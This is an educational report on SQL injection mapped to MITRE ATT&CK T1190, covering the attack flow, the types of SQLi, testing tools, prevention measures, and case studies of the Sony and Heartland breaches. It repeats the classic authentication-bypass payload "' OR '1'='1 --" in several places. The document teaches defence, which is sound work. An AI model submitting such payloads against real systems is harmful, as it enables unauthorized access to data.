Raj Yadav
Abstract
SQL Injection (SQLi) is a code injection vulnerability
that allows attackers to manipulate queries an
application sends to its database. It is one of the most
common and dangerous vulnerabilities in web
applications. This report explores SQLi in the context of
MITRE ATT&CK Technique T1190 – Exploit Public-
Facing Application – to help understand, detect, and
mitigate such attacks.
1
� Raj Yadav
Introduction
SQL Injection (SQLi) occurs when untrusted input is
inserted into an SQL query without proper sanitization.
It enables attackers to bypass authentication, access,
modify, or delete database data. Historically, SQLi has
been responsible for some of the largest data breaches,
and it remains relevant today due to widespread use of
SQL databases.
2
� Raj Yadav
MITRE ATT&CK Mapping
SQLi maps to MITRE ATT&CK Technique ID T1190 –
Exploit Public-Facing Application. Adversaries exploit
vulnerabilities in Internet-facing systems to gain initial
access
SQL Injection (SQLi) is a specific example of T1190,
which covers exploiting vulnerabilities in internet-
facing systems to gain unauthorized access.
In SQLi:
1. Public-Facing Entry Point – A website, API, or
application connected to a database is accessible from
the internet.
2. Vulnerability – Poor input validation or insecure SQL
query construction.
3. Exploitation – The attacker injects crafted SQL
commands into input fields.
4. Initial Access – Malicious queries execute on the
backend, allowing the attacker to bypass authentication,
extract/modify sensitive data, or pivot deeper into the
network.
3
� Raj Yadav
This matches T1190’s definition because:
- The target is an internet-facing application.
- The method is exploiting a coding flaw.
- The outcome is initial access to systems and data.
Example Flow
1. Attacker scans for a vulnerable login page.
2. Injection payload submitted:
' OR '1'='1 --
3. Backend executes malicious SQL without validation.
4. Access granted to protected data or admin accounts.
4
� Raj Yadav
Types of SQL Injection
● Classic/Basic SQLi: Injection in form fields or URLs.
Example: ' OR '1'='1
● Blind SQLi: No visible errors; information inferred
through true/false behavior.
● Time-Based Blind SQLi: Server response time
indicates payload success.
● Union-Based SQLi: Uses UNION to fetch data from
other tables.
● Error-Based SQLi: Uses SQL errors to extract data.
● Out-of-Band SQLi: Uses alternate channels like
DNS/HTTP to extract data.
Example SQL Injection payload in a login query:
SELECT * FROM users WHERE username = 'admin' AND
password = '1234';
' OR '1'='1 –
5
� Raj Yadav
Testing Methods
Common tools and methods for detecting SQLi:
● SQLMap – Automated SQLi testing
● Burp Suite – Web proxy for interception
● Nmap + NSE Scripts – Service detection
● Manual Payloads – e.g., ' OR 1=1 --
Prevention Techniques
● Parameterized Queries / Prepared Statements
● Use of ORMs (Object Relational Mappers)
● Strict Input Validation (Whitelisting)
● Least Privilege Principle
● Web Application Firewall (WAF)
6
� Raj Yadav
Case Studies
Sony Pictures Hack (2011)
In April 2011, Sony Pictures Entertainment suffered a
massive cyberattack in which attackers used SQL Injection
to compromise their databases. This was part of a larger
string of breaches against Sony entities during that year.
The attack was claimed by the hacking group LulzSec.
Attack Method:
● The attackers targeted poorly secured web
applications belonging to Sony Pictures.
● By inserting malicious SQL queries into vulnerable
input fields, they were able to bypass
authentication and directly access backend
databases.
● Vulnerable pages lacked input sanitization and
prepared statements, making exploitation trivial.
Impact:
● Stolen personal data of approximately 1 million
users, including names, passwords, email
addresses, home addresses, dates of birth, and
7
� Raj Yadav
other profile data.
● Passwords were stored in plaintext, further
amplifying the security failure.
● Sensitive data was leaked publicly on file-sharing
sites.
Key Findings:
● No encryption or hashing for stored passwords.
● Lack of basic security practices like parameterized
queries.
● Absence of a Web Application Firewall (WAF) to
filter SQL injection payloads.
● Public backlash and major brand damage,
alongside lawsuits and investigations.
Lessons Learned:
● Even large corporations can fall victim to simple,
well-known vulnerabilities when security hygiene
is poor.
● Security fundamentals—such as hashing
passwords, validating inputs, and patching systems
—are critical for preventing such breaches.
8
� Raj Yadav
Heartland Payment Systems Breach (2008)
In 2008, Heartland Payment Systems, a major US-based
payment processor, suffered one of the largest data
breaches in history. The breach was discovered in
January 2009, but it had been ongoing for months.
The attack involved SQL Injection as one of the key
methods of compromise, alongside network-level
malware deployment.
Attack Method:
● Attackers exploited SQL Injection vulnerabilities in
Heartland’s payment processing web services to
gain an initial foothold.
9
� Raj Yadav
● This access allowed them to install custom sniffer
malware on Heartland’s internal network.
● The malware intercepted credit card data in
transit, capturing magnetic stripe information
before encryption.
Impact:
● Over 130 million credit and debit card numbers
were stolen.
● Massive financial fraud ensued, with millions of
dollars in fraudulent transactions worldwide.
● Heartland faced lawsuits, regulatory fines, and had
to pay more than $140 million in settlements to
banks and credit card companies.
● Their PCI DSS (Payment Card Industry Data
Security Standard) compliance certification was
revoked until they passed a full re-audit.
Key Findings:
● SQL Injection opened the door for deeper
compromise.
10
� Raj Yadav
● The breach went undetected for months due to
insufficient monitoring.
● Network segmentation between public-facing and
internal systems was either weak or absent.
Lessons Learned:
● Payment processors must implement multi-
layered defenses — WAFs, input validation,
database hardening, and strict network
segmentation.
● Continuous monitoring and anomaly detection can
identify malicious activity early.
● Compliance checklists alone don’t guarantee
security — real-world resilience requires active
threat detection and patch management.
11
� Raj Yadav
Diagram: SQL Injection Process
The diagram below illustrates the flow of a SQL
Injection attack. It begins with user input, such as from
a login form, which is processed by the application
without proper validation. Malicious SQL code is
inserted into the query and executed by the database,
potentially leading to the exposure, modification, or
deletion of sensitive data.
12
� Raj Yadav
Screenshot: SQLMap Testing
The following screenshot shows an example run of
SQLMap, an automated SQL Injection testing tool. In this
simulated case, SQLMap detects a UNION-based SQL
injection vulnerability in the 'user' parameter and
successfully retrieves the names of the databases from
the target server.
13
